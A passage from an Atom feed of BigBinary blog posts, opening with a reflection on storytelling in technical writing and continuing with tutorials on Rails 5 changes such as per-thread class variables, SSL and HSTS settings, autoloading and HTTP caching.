tone:</p><blockquote><p>No matter how short it is, it should have a beginning, a middle, and an end. Don't forget the story.</p></blockquote><p>Lasseter complained that it was a pretty short movie and there might not be time to present a story.</p><p>Raoul Servais replied:</p><blockquote><p>You can tell a story in ten seconds.</p></blockquote><p>Lasseter started developing a character. He came up with the idea of <em>Luxo Jr.</em></p><p><a href="https://www.youtube.com/watch?v=6G3O60o5U7w">Here is</a> the final production of <strong>Luxo Jr.</strong></p><p>Luxo Jr. was a major hit at the conference. The crowd was on its feet in applause even before the two-minute film was over. Remember, this was 1986: computer animation was not very advanced at the time, and this was the first movie ever made using just computer graphics.</p><p>Lasseter later said that while the audience was watching the movie, they forgot they were watching a computer animated film, because the story took over. He learned the lesson that technology should enable better storytelling, and that technology divorced from storytelling would not advance the cause of Pixar.</p><p>Later, John Lasseter went on to produce hits like Toy Story, A Bug's Life, Toy Story 2, Cars, Cars 2, Monsters Inc., Finding Nemo and many more.</p><p>So you see, even the great John Lasseter had to be reminded to tell a story.</p><h2>Actual content over bullet points</h2><p><a href="https://en.wikipedia.org/wiki/Jeff_Bezos">Jeff Bezos</a> is so focused on knowing the full story that he banned the usage of PowerPoint in internal meetings and discussions. As per him, it is easy to hide behind bullet points in a PowerPoint presentation.</p><p>He insisted on writing the full story in a Word document and distributing it to meeting attendees. The meetings start with everyone, heads down, reading the document.</p><p>He is also known for saying that if we are building a feature, then we first need to know how it would be presented to consumers when it is unveiled. We need to know the story we are going to tell them. Without the story we won't have the full picture of what we are going to build.</p><h2>Learning to tell a story is a journey</h2><p>I'm glad that during the last 310 days 16 people contributed to the blog posts. The process of writing the posts was at times frustrating for a bunch of them. They had done the work of digging into the code and had posted their findings. Continuously getting feedback to edit the blog to build a nice coherent story, where each paragraph is an extension of the previous paragraph, is a downer. Some were dismayed at why we were spending so much energy on a technical blog.</p><p>However, in the end we are all happy that we underwent this exercise. We could see the initial draft of the blog and the final version, and we could all see the difference.</p><p>By no means have we mastered the art of storytelling. It's a long journey. However, we believe we are on the right path. Hopefully in the coming months and years we at BigBinary will be able to bring you more stories from changes in Rails and other places.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Create module and class level variables]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-ability-to-create-module-and-class-level-variables-on-per-thread-basis"/>
      <updated>2016-09-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-ability-to-create-module-and-class-level-variables-on-per-thread-basis</id>
      <content type="html"><![CDATA[<p>Rails already provides methods for creating class level and module level variables in the form of the <a href="http://guides.rubyonrails.org/active_support_core_extensions.html#cattr-reader-cattr-writer-and-cattr-accessor">cattr_* and mattr_* suite of methods</a>.</p><p>In Rails 5, we can go a step further and create <a href="https://github.com/rails/rails/pull/22630">thread specific class or module level variables</a>.</p><p>Here is an example demonstrating how to use it.</p><pre><code class="language-ruby">module CurrentScope
  thread_mattr_accessor :user_permissions
end

class ApplicationController &lt; ActionController::Base
  before_action :set_permissions

  def set_permissions
    user = User.find(params[:user_id])
    CurrentScope.user_permissions = user.permissions
  end
end</code></pre><p>Now <code>CurrentScope.user_permissions</code> will be available for the lifetime of the currently executing thread, and all the code after this point can use this variable.</p><p>For example, we can access this variable in any of the models without explicitly passing <code>current_user</code> from the controller.</p><pre><code class="language-ruby">class BookingsController &lt; ApplicationController
  def create
    Booking.create(booking_params)
  end
end

class Booking &lt; ApplicationRecord
  validate :check_permissions

  private

  def check_permissions
    unless CurrentScope.user_permissions.include?(:create_booking)
      self.errors.add(:base, &quot;Not permitted to allow creation of booking&quot;)
    end
  end
end</code></pre><p>It internally uses the <a href="https://ruby-doc.org/core-2.3.0/Thread.html#method-i-5B-5D-3D">Thread.current#[]=</a> method, so all the variables are scoped to the thread currently executing. It will also take care of namespacing these variables per class or module, so that <code>CurrentScope.user_permissions</code> and <code>RequestScope.user_permissions</code> will not conflict with each other.</p><p>If you have used <a href="http://api.rubyonrails.org/classes/ActiveSupport/PerThreadRegistry.html">PerThreadRegistry</a> before for managing global variables, the <code>thread_mattr_*</code> &amp; <code>thread_cattr_*</code> methods can be used in its place starting from Rails 5.</p><p>Globals are generally bad and should be avoided, but this change provides a nicer API if you want to fiddle with them anyway!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 silences assets logs in dev mode by default]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-silences-assets-logs-in-development-mode-by-default"/>
      <updated>2016-09-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-silences-assets-logs-in-development-mode-by-default</id>
      <content type="html"><![CDATA[<p>As a Rails developer, it was a familiar sight to see asset logs flooding the whole terminal in development mode.</p><pre><code class="language-plaintext">Started GET &quot;/assets/application.self-4a04ce68c5ebf2d39fba46316802f17d0a73fadc4d2da50a138d7a4bf2d26a84.css?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530
Started GET &quot;/assets/bootstrap/transition.self-6ad2488465135ab731a045a8ebbe3ea2fc501aed286042496eda1664fdd07ba9.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530
Started GET &quot;/assets/bootstrap/collapse.self-2eb697f62b587bb786ff940d82dd4be88cdeeaf13ca128e3da3850c5fcaec301.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530
Started GET &quot;/assets/jquery_ujs.self-e87806d0cf4489aeb1bb7288016024e8de67fd18db693fe026fe3907581e53cd.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530
Started GET &quot;/assets/jquery.self-660adc51e0224b731d29f575a6f1ec167ba08ad06ed5deca4f1e8654c135bf4c.js?body=1&quot; for 127.0.0.1 at 2016-09-02 10:23:04 +0530</code></pre><p>Fortunately, we could include the <code>quiet_assets</code> gem in our application. It turns off the Rails asset pipeline log in development mode.</p><pre><code class="language-plaintext">Started GET &quot;/assets/application.js&quot; for 127.0.0.1 at 2016-08-28 19:35:34</code></pre><h3>quiet_assets is part of Rails 5</h3><p>Now the quiet_assets gem's functionality is folded into Rails 5 itself.</p><p>A new configuration option, <code>config.assets.quiet</code>, when set to <code>true</code>, <a href="https://github.com/rails/sprockets-rails/pull/355">loads a Rack middleware named Sprockets::Rails::QuietAssets</a>. This middleware checks whether the current request matches the assets prefix path and, if it does, silences logging for that request.</p><p>This eliminates the need to add an external gem for this.</p><p>By default, <a href="https://github.com/rails/rails/pull/25351"><code>config.assets.quiet</code> is set to <code>true</code></a> in development mode.
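If we ever want the verbose asset logs back, or want to flip the flag explicitly in an upgraded app, the option can be set in the environment configuration. A minimal sketch, assuming the conventional environment file location:

```ruby
# config/environments/development.rb
Rails.application.configure do
  # true (the Rails 5 default) silences per-asset "Started GET ..." lines;
  # set it to false to restore the verbose asset logging shown above.
  config.assets.quiet = true
end
```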
So we don't have to do anything. It just works out of the box.</p><h3>Compatibility with older versions of Rails</h3><p>This functionality has been backported to sprockets-rails 3.1.0 and is available in <a href="https://github.com/rails/rails/pull/25397">Rails 4.2.7</a> as well.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 disables autoloading while app in production]]></title>
       <author><name>Shailesh Kalamkar</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-disables-autoloading-after-booting-the-app-in-production"/>
      <updated>2016-08-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-disables-autoloading-after-booting-the-app-in-production</id>
      <content type="html"><![CDATA[<p>This blog requires an understanding of what <code>autoloading</code> is. If you are not familiar with it, please refer to the <a href="http://guides.rubyonrails.org/autoloading_and_reloading_constants.html">Autoloading and Reloading Constants</a> article in the Rails Guides.</p><h2>Eager load paths</h2><p>Autoloading is <a href="https://github.com/rails/rails/issues/13142">not thread-safe</a>, and hence we need to make sure that all constants are loaded when the application boots. The concept of loading all the constants even before they are actually needed is called &quot;eager loading&quot;. In a way it is the opposite of &quot;autoloading&quot;: with autoloading, the application does not load a constant until it is needed. Once a class is needed and found missing, the application starts looking in the &quot;autoload paths&quot; to load the missing class.</p><p><code>eager_load_paths</code> contains a list of directories. When the application boots in production, it loads all constants found in all directories listed in <code>eager_load_paths</code>.</p><p>We can add directories to <code>eager_load_paths</code> as shown below.</p><pre><code class="language-ruby"># config/application.rb
config.eager_load_paths &lt;&lt; Rails.root.join('lib')</code></pre><h2>In Rails 5 autoloading is disabled in the production environment by default</h2><p>With <a href="https://github.com/rails/rails/commit/a71350cae0082193ad8c66d65ab62e8bb0b7853b">this commit</a>, Rails will no longer autoload in production after the application has booted.</p><p>Rails will load all the constants from <code>eager_load_paths</code>, but if a constant is missing it will not look in <code>autoload_paths</code> and will not attempt to load the missing constant.</p><p>This is a breaking change for some applications.
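To make the failure mode concrete, here is a plain-Ruby sketch (`ReportBuilder` is a hypothetical class that, in Rails 4.x, would have been autoloaded from a file under `autoload_paths`): with autoloading disabled after boot, referencing a constant that was never eager loaded raises `NameError` instead of triggering a file lookup.

```ruby
# Referencing a constant that was neither eager loaded nor required:
# Rails 5 production no longer falls back to autoload_paths, so we get
# a plain NameError, just as in any ordinary Ruby program.
begin
  ReportBuilder.new # hypothetical class from lib/report_builder.rb
rescue NameError => e
  puts e.message # "uninitialized constant ReportBuilder"
end
```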
For the vast majority of applications this should not be an issue.</p><p>In the rare situation where our application still needs autoloading in the <code>production</code> environment, we can enable it by setting <code>enable_dependency_loading</code> to <code>true</code> as follows:</p><pre><code class="language-ruby"># config/application.rb
config.enable_dependency_loading = true
config.autoload_paths &lt;&lt; Rails.root.join('lib')</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds more control to fine tuning SSL usage]]></title>
       <author><name>Srihari K</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-more-control-to-fine-tuning-ssl-usage"/>
      <updated>2016-08-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-more-control-to-fine-tuning-ssl-usage</id>
      <content type="html"><![CDATA[<p>Adding HTTPS support is one of the first steps towards enhancing the security of a web application.</p><p>Even when a web app is available over <code>https</code>, some users may end up visiting the <code>http</code> version of the app, losing the security <code>https</code> provides.</p><p>It is important to redirect users to the <code>https</code> URLs whenever possible.</p><h2>Forcing HTTPS in Rails</h2><p>We can force users to use HTTPS by setting <code>config.force_ssl = true</code>.</p><p>If we look at the Rails source code, we can see that when we set <code>config.force_ssl = true</code>, a middleware, <code>ActionDispatch::SSL</code>, is inserted into our app's middleware stack:</p><pre><code class="language-ruby">if config.force_ssl
  middleware.use ::ActionDispatch::SSL, config.ssl_options
end</code></pre><p>This middleware, <code>ActionDispatch::SSL</code>, is responsible for doing three things:</p><ol><li><p>Redirect all <code>http</code> requests to their <code>https</code> equivalents.</p></li><li><p>Set the <code>secure</code> flag on cookies to tell browsers that these cookies must not be sent for <code>http</code> requests.</p></li><li><p>Add HSTS headers to the response.</p></li></ol><p>Let us go through each of these.</p><h3>Redirect all http requests to their https equivalents</h3><p>In Rails 5, we can configure the behavior of redirection using the <code>redirect</code> key in the <code>config.ssl_options</code> configuration.</p><p>In previous versions of Rails, whenever an <code>http</code> request was redirected to <code>https</code>, it was done with an HTTP <code>301</code> redirect.</p><p>Browsers cache 301 redirects. When forcing https redirects, if at any point we want to test the <code>http</code> version of a page, it would be hard to browse it, since the browser would redirect to the <code>https</code> version. Although this is the desired behavior in production, it is a pain during testing and deployment.</p><p>Rails 5 lets us <a href="https://github.com/rails/rails/pull/21520">specify the status code for redirection</a>, which can be set to <code>302</code> or <code>307</code> for testing, and later to <code>301</code> when we are ready for deployment to production.</p><p>We can specify the options for redirection in Rails 5 as follows:</p><pre><code class="language-ruby">config.force_ssl = true
config.ssl_options = { redirect: { status: 307, port: 81 } }</code></pre><p>If a redirect status is not specified, requests are redirected with a <code>301</code> status code.</p><p>There is an <a href="https://github.com/rails/rails/pull/23941">upcoming change</a> to make the status code used for redirecting any non-GET, non-HEAD http requests <code>307</code> by default.</p><p>Other options accepted by <code>ssl_options</code> under the <code>redirect</code> key are <code>host</code> and <code>body</code>.</p><h3>Set secure flags on cookies</h3><p>By setting the <code>Secure</code> flag on a cookie, the application can instruct the browser not to send the cookie in clear text. Browsers which support this flag will send such cookies only through <code>HTTPS</code> connections.</p><p>Setting the secure flag on cookies is important to prevent cookie hijacking by <a href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack">man-in-the-middle attacks</a>.</p><p>In a &quot;man in the middle&quot; attack, the attacker sits between the user and the server, aiming to collect the cookies which are sent from the user to the server on every request. However, if we mark the cookies with sensitive information as <code>Secure</code>, those cookies won't be sent on <code>http</code> requests. This ensures that the browser never sends cookies to an attacker impersonating the web server at an <code>http</code> endpoint.</p><p>Upon enabling <code>config.force_ssl = true</code>, the <code>ActionDispatch::SSL</code> middleware sets the <code>Secure</code> flag on all cookies by default.</p><h3>Set HSTS headers on responses</h3><p><a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">HSTS</a>, or &quot;HTTP Strict Transport Security&quot;, is a security enhancement by which applications can declare themselves HTTPS-only to complying browsers.</p><p>The HSTS capabilities of a browser can be used by sending appropriate response headers from the server. When a domain is added to the HSTS list of a browser, the browser redirects to the <code>https</code> version of the URL without the help of the server.</p><p>Chrome maintains an <a href="https://hstspreload.appspot.com/">HSTS Preload List</a> of domains which are hardcoded into Chrome as HTTPS only. This list is also used by Firefox and Safari.</p><p>Rails 5 has a configuration flag to set the <code>preload</code> directive in the HSTS header, which can be used as follows:</p><pre><code class="language-ruby">config.ssl_options = { hsts: { preload: true } }</code></pre><p>We can also specify a <code>max-age</code> for the HSTS header.</p><p>Rails 5 by default sets the <code>max-age</code> of the HSTS header to 180 days, which is considered the lower bound by the <a href="https://www.ssllabs.com/ssltest">SSL Labs SSL Test</a>. This period is also above the 18-week requirement for the HSTS <code>max-age</code> mandated for inclusion in the browser preload list.</p><p>We can specify a custom max-age as follows:</p><pre><code class="language-ruby">config.ssl_options = { hsts: { expires: 10.days } }</code></pre><p>If we disable HSTS by setting:</p><pre><code class="language-ruby">config.ssl_options = { hsts: false }</code></pre><p>Rails 5 will set the value of the expires directive to 0, so that browsers immediately stop treating the domain as HTTPS-only.</p><p>With a custom redirect status and greater control over the HSTS header, Rails 5 lets us roll out <code>HTTPS</code> in a controlled manner, and makes rolling back these changes easier.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Discard some flash messages to trim storage]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-trims-session-storage-by-discarding-some-flash-messages"/>
      <updated>2016-08-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-trims-session-storage-by-discarding-some-flash-messages</id>
      <content type="html"><![CDATA[<p>Rails, by default, stores session data in cookies.</p><p>Cookies have a storage limit of 4K, and a cookie overflow exception is raised if we attempt to store more than 4K of data in them.</p><h3>Cookie overflow issue with Rails 4.x</h3><p>Flash messages are persisted across requests with the help of session storage.</p><p>Flash messages like <code>flash.now</code> are marked as discarded for the next request. So, on the next request, they get deleted before the values are reconstituted.</p><p>This unnecessary storage of discarded flash messages leads to more consumption of data in the cookie store. When the data exceeds the 4K limit, Rails throws <code>ActionDispatch::Cookies::CookieOverflow</code>.</p><p>Let us see an example below to demonstrate this.</p><pre><code class="language-ruby">class TemplatesController &lt; ApplicationController
  def search
    @templates = Template.search(params[:search])
    flash.now[:notice] = &quot;Your search results for #{params[:search]}&quot;
    flash[:alert] = &quot;Alert message&quot;
    p session[:flash]
  end
end

# logs
{&quot;discard&quot;=&gt;[&quot;notice&quot;], &quot;flashes&quot;=&gt;{&quot;notice&quot;=&gt;&quot;Your search results for #{Value of search params}&quot;, &quot;alert&quot;=&gt;&quot;Alert message&quot;}}</code></pre><p>In the above example, it is possible that <code>params[:search]</code> contains a large amount of data, causing Rails to raise <code>CookieOverflow</code>, as the session persists both <code>flash.now[:notice]</code> and <code>flash[:alert]</code>.</p><h3>Rails 5 removes discarded flash messages</h3><p>In Rails 5, <a href="https://github.com/rails/rails/pull/18721">discarded flash messages are removed</a> before persisting into the session, leading to less consumption of space and hence fewer chances of <code>CookieOverflow</code> being raised.</p><pre><code class="language-ruby">class TemplatesController &lt; ApplicationController
  def search
    @templates = Template.search(params[:search], params[:template])
    flash.now[:notice] = &quot;Your search results for #{params[:search]} with template #{params[:template]}&quot;
    flash[:alert] = &quot;Alert message&quot;
    p session[:flash]
  end
end

# logs
{&quot;discard&quot;=&gt;[], &quot;flashes&quot;=&gt;{&quot;alert&quot;=&gt;&quot;Alert message&quot;}}</code></pre><p>We can see from the above example that the <code>flash.now</code> value is not added to the session in Rails 5, reducing the chances of raising <code>ActionDispatch::Cookies::CookieOverflow</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 deprecates alias_method_chain]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-deprecates-alias-method-chain"/>
      <updated>2016-08-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-deprecates-alias-method-chain</id>
      <content type="html"><![CDATA[<p>Rails 5 has <a href="https://github.com/rails/rails/pull/19434">deprecated the usage of alias_method_chain</a> in favor of Ruby's built-in <code>Module#prepend</code>.</p><h2>What is alias_method_chain and when to use it</h2><p>A lot of good articles have been written by some very smart people on the topic of &quot;alias_method_chain&quot;, so we will not attempt to describe it here.</p><p><a href="https://ernie.io">Ernie Miller</a> wrote <a href="https://ernie.io/2011/02/03/when-to-use-alias_method_chain/">When to use alias_method_chain</a> more than five years ago, but it is still worth a read.</p><h2>Using Module#prepend to solve the problem</h2><p>Ruby 2.0 introduced <code>Module#prepend</code>, which allows us to insert a module before a class in the class's ancestor hierarchy.</p><p>Let's try to solve the same problem using <code>Module#prepend</code>.</p><pre><code class="language-ruby">module Flanderizer
  def hello
    &quot;#{super}-diddly&quot;
  end
end

class Person
  def hello
    &quot;Hello&quot;
  end
end

# In Ruby 2.0
Person.send(:prepend, Flanderizer)

# In Ruby 2.1
Person.prepend(Flanderizer)

flanders = Person.new
puts flanders.hello #=&gt; &quot;Hello-diddly&quot;</code></pre><p>Now we are back to being nice to our neighbor, which should make Ernie happy.</p><p>Let's see what the ancestor chain looks like.</p><pre><code class="language-ruby">flanders.class.ancestors # =&gt; [Flanderizer, Person, Object, Kernel]</code></pre><p>In Ruby 2.1 both <code>Module#include</code> and <code>Module#prepend</code> became public methods. In the above example we have shown both the Ruby 2.0 and Ruby 2.1 versions.</p>]]></content>
    </entry><entry>
       <title><![CDATA[New framework defaults in Rails 5 to make upgrade easier]]></title>
       <author><name>Srihari K</name></author>
      <link href="https://www.bigbinary.com/blog/new-framework-defaults-in-rails-5-to-make-upgrade-easier"/>
      <updated>2016-08-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/new-framework-defaults-in-rails-5-to-make-upgrade-easier</id>
      <content type="html"><![CDATA[<p>When a new version of Rails comes out, one of the pain points is upgradingexisting apps to the latest version.</p><p>A Rails upgrade can be boiled down to following essential steps :</p><ol><li>Have a green build</li><li>Update the Rails version in Gemfile and bundle</li><li>Run the update task to update configuration files</li><li>Run tests and sanity checks to see if anything is broken by the upgrade andfix the issues</li><li>Repeat step 4!</li></ol><p>Rails 5 comes with a lot of new features. Some of them, like<a href="rails-5-does-not-halt-callback-chain-when-false-is-returned">not halting the callback chain when a callback returns false</a>,are breaking changes for older apps.</p><p>To keep the upgrade process easier, Rails 5 has added feature flags for all ofthese breaking changes.</p><p>When we create a brand new Rails 5 app, all of the feature flags will be turnedon. We can see these feature flags in<a href="https://github.com/rails/rails/pull/25231"><code>config/initializers/new_framework_defaults.rb</code> file</a>.</p><p>But when we upgrade an app to Rails 5, just updating the Gemfile and bundling isnot enough.</p><p>We need to run the <code>bin/rails app:update</code> task which will update fewconfigurations and also add <code>config/initializers/new_framework_defaults.rb</code>file.</p><p>Rails will turn off all the feature flags in the<code>config/initializers/new_framework_defaults.rb</code> file while upgrading an olderapp. In this way our app won't break due to the breaking features.</p><p>Lets take a look at these configuration flags one by one.</p><h4>Enable per-form CSRF tokens</h4><p>Starting from Rails 5,<a href="per-form-csrf-token-in-rails-5">each form will get its own CSRF token</a>. 
Thischange will have following feature flag.</p><pre><code class="language-ruby">Rails.application.config.action_controller.per_form_csrf_tokens</code></pre><p>For new apps, it will be set to <code>true</code> and for older apps upgraded to Rails 5,it will be set to <code>false</code>. Once we are ready to use this feature in our upgradedapp, we just need to change it to <code>true</code>.</p><h4>Enable HTTP Origin Header checking for CSRF mitigation</h4><p>For additional defense against CSRF attacks, Rails 5 has a feature to check HTTPOrigin header against the site's origin. This will be disabled by default inupgraded apps using the following configuration option:</p><pre><code class="language-ruby">Rails.application.config.action_controller.forgery_protection_origin_check</code></pre><p>We can set it to <code>true</code> to enable HTTP origin header check when we are ready touse this feature.</p><h4>Make Ruby 2.4 preserve the timezone of the receiver</h4><p>In Ruby 2.4 the <code>to_time</code> method for both<a href="https://bugs.ruby-lang.org/issues/12271"><code>DateTime</code> and <code>Time</code> will preserve the timezone of the receiver</a><a href="https://bugs.ruby-lang.org/issues/12189">when converting to an instance of <code>Time</code></a>.For upgraded apps, this feature is disabled by setting the followingconfiguration option to <code>false</code> :</p><pre><code class="language-ruby">ActiveSupport.to_time_preserves_timezone</code></pre><p>To use the Ruby 2.4+ default of <code>to_time</code>, set this to <code>true</code> .</p><h4>Require <code>belongs_to</code> associations by default</h4><p>In Rails 5, when we define a <code>belongs_to</code> association,<a href="rails-5-makes-belong-to-association-required-by-default">the association record is required to be present</a>.</p><p>In upgraded apps, this validation is not enabled. 
It is disabled using the following option:</p><pre><code class="language-ruby">Rails.application.config.active_record.belongs_to_required_by_default</code></pre><p>We can update our code to use this feature and turn it on by changing the above option to <code>true</code>.</p><h4>Do not halt the callback chain when a callback returns false</h4><p>In Rails 5, <a href="rails-5-does-not-halt-callback-chain-when-false-is-returned">the callback chain is not halted when a callback returns false</a>. This change is turned off for backward compatibility with the following option set to <code>true</code>:</p><pre><code class="language-ruby">ActiveSupport.halt_callback_chains_on_return_false</code></pre><p>We can adopt the new behavior of not halting the callback chain by making sure our code does not break due to this change and then changing the value of this config to <code>false</code>.</p><h4>Configure SSL options to enable HSTS with subdomains</h4><p>HTTP Strict Transport Security, or HSTS, is a web security policy mechanism which helps protect websites against protocol downgrade attacks and cookie hijacking. Using HSTS, we can ask browsers to make connections using only HTTPS. In upgraded apps, HSTS is not enabled on subdomains. In new apps it is enabled using the following option:</p><pre><code class="language-ruby">Rails.application.config.ssl_options = { hsts: { subdomains: true } }</code></pre><p>Having all these backward incompatible features in one file, where they can be turned on one by one after the upgrade, eases the upgrade process. This initializer also has helpful comments explaining the features!</p><p>Happy Upgrading!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Wildcard for specifying template dependencies]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-wildcard-for-specifying-template-dependencies"/>
      <updated>2016-08-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-wildcard-for-specifying-template-dependencies</id>
      <content type="html"><![CDATA[<h3>Cache Digests</h3><p>After cache digests were introduced in Rails, all calls to <code>#cache</code> in views automatically append a digest of that template and all of its dependencies to the cache key.</p><p>So developers no longer need to manually expire the cache for the specific templates they make changes to.</p><pre><code class="language-ruby"># app/views/users/show.html.erb
&lt;% cache user do %&gt;
  &lt;h1&gt;All Posts&lt;/h1&gt;
  &lt;%= render user.posts %&gt;
&lt;% end %&gt;

# app/views/posts/_post.html.erb
&lt;% cache post do %&gt;
  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;
  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;
  &lt;%= render 'posts/completed' %&gt;
&lt;% end %&gt;</code></pre><p>This creates a caching key something like <code>views/users/605416233-20129410191209/d9fb66b12bx8edf46707c67ab41d93cb2</code>, which depends upon the template and its dependencies.</p><p>So now if we change <code>posts/_completed.html.erb</code>, it will change the cache key and thus allow the cache to expire automatically.</p><h3>Explicit dependencies</h3><p>As we saw in our earlier example, Rails was able to determine template dependencies implicitly. But sometimes it is not possible to determine dependencies at all.</p><p>Let's see an example below.</p><pre><code class="language-ruby"># app/views/users/show.html.erb
&lt;% cache user do %&gt;
  &lt;h1&gt;All Posts&lt;/h1&gt;
  &lt;%= render user.posts %&gt;
&lt;% end %&gt;

# app/views/posts/_post.html.erb
&lt;% cache post do %&gt;
  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;
  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;
  &lt;%= render_post_complete_or_not(post) %&gt;
&lt;% end %&gt;

# app/helpers/posts_helper.rb
module PostsHelper
  def render_post_complete_or_not(post)
    if post.completed?
      render 'posts/complete'
    else
      render 'posts/incomplete'
    end
  end
end</code></pre><p>To explicitly add a dependency on such a template, we need to add a <a href="http://api.rubyonrails.org/classes/ActionView/Helpers/CacheHelper.html#method-i-cache-label-Explicit+dependencies">comment in a special format</a> as follows.</p><pre><code class="language-ruby">  &lt;%# Template Dependency: posts/complete %&gt;
  &lt;%# Template Dependency: posts/incomplete %&gt;</code></pre><p>If we have multiple dependencies, we need to add special comments for all the dependencies one by one.</p><pre><code class="language-ruby"># app/views/posts/_post.html.erb
&lt;% cache post do %&gt;
  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;
  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;
  &lt;%# Template Dependency: posts/complete %&gt;
  &lt;%# Template Dependency: posts/incomplete %&gt;
  &lt;%= render_post_complete_or_not(post) %&gt;
&lt;% end %&gt;</code></pre><h3>Using Wildcard in Rails 5</h3><p>In Rails 5, we can now use a <a href="https://github.com/rails/rails/pull/20904">wildcard for adding dependencies</a> on multiple files in a directory. So, instead of adding files one by one, we can add the dependency using a wildcard.</p><pre><code class="language-ruby"># app/views/posts/_post.html.erb
&lt;% cache post do %&gt;
  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;
  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;
  &lt;%# Template Dependency: posts/* %&gt;
  &lt;%= render_post_complete_or_not(post) %&gt;
&lt;% end %&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Passing records to fresh_when and stale?]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-passing-collection-of-records-to-fresh_when-and-stale"/>
      <updated>2016-08-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-passing-collection-of-records-to-fresh_when-and-stale</id>
      <content type="html"><![CDATA[<p>Rails has powerful tools to control <a href="http://api.rubyonrails.org/classes/ActionController/ConditionalGet.html">caching of resources via HTTP</a>, such as <code>fresh_when</code> and <code>stale?</code>.</p><p>Previously we could only pass a single record to these methods, but Rails 5 adds support for accepting a collection of records as well. For example,</p><pre><code class="language-ruby">def index
  @posts = Post.all
  fresh_when(etag: @posts, last_modified: @posts.maximum(:updated_at))
end</code></pre><p>or more simply,</p><pre><code class="language-ruby">def index
  @posts = Post.all
  fresh_when(@posts)
end</code></pre><p>This works with the <code>stale?</code> method too; we can pass a collection of records to it. For example,</p><pre><code class="language-ruby">def index
  @posts = Post.all
  if stale?(@posts)
    render json: @posts
  end
end</code></pre><p>To see this in action, let's begin by making a request at <code>/posts</code>.</p><pre><code class="language-bash">$ curl -I http://localhost:3000/posts
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
ETag: W/&quot;a2b68b7a7f8c67f1b88848651a86f5f5&quot;
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 7c8457e7-9d26-4646-afdf-5eb44711fa7b
X-Runtime: 0.074238</code></pre><p>In the second request, we send the ETag in the <code>If-None-Match</code> header to check if the data has changed.</p><pre><code class="language-bash">$ curl -I -H 'If-None-Match: W/&quot;a2b68b7a7f8c67f1b88848651a86f5f5&quot;' http://localhost:3000/posts
HTTP/1.1 304 Not Modified
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
ETag: W/&quot;a2b68b7a7f8c67f1b88848651a86f5f5&quot;
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 6367b2a5-ecc9-4671-8a79-34222dc50e7f
X-Runtime: 0.003756</code></pre><p>Since there's no change, the server returned <code>HTTP/1.1 304 Not Modified</code>. If these requests were made from a browser, it would automatically use the version in its cache on the second request.</p><p>The second request was obviously faster, as the server was able to save the time of fetching and rendering the data. This can be seen in the Rails log:</p><pre><code class="language-plaintext">Started GET &quot;/posts&quot; for ::1 at 2016-08-06 00:39:44 +0530
Processing by PostsController#index as HTML
   (0.2ms)  SELECT MAX(&quot;posts&quot;.&quot;updated_at&quot;) FROM &quot;posts&quot;
   (0.1ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;posts&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;posts&quot;
  Rendering posts/index.html.erb within layouts/application
  Post Load (0.2ms)  SELECT &quot;posts&quot;.* FROM &quot;posts&quot;
  Rendered posts/index.html.erb within layouts/application (2.0ms)
Completed 200 OK in 31ms (Views: 27.1ms | ActiveRecord: 0.5ms)

Started GET &quot;/posts&quot; for ::1 at 2016-08-06 00:39:46 +0530
Processing by PostsController#index as HTML
   (0.2ms)  SELECT MAX(&quot;posts&quot;.&quot;updated_at&quot;) FROM &quot;posts&quot;
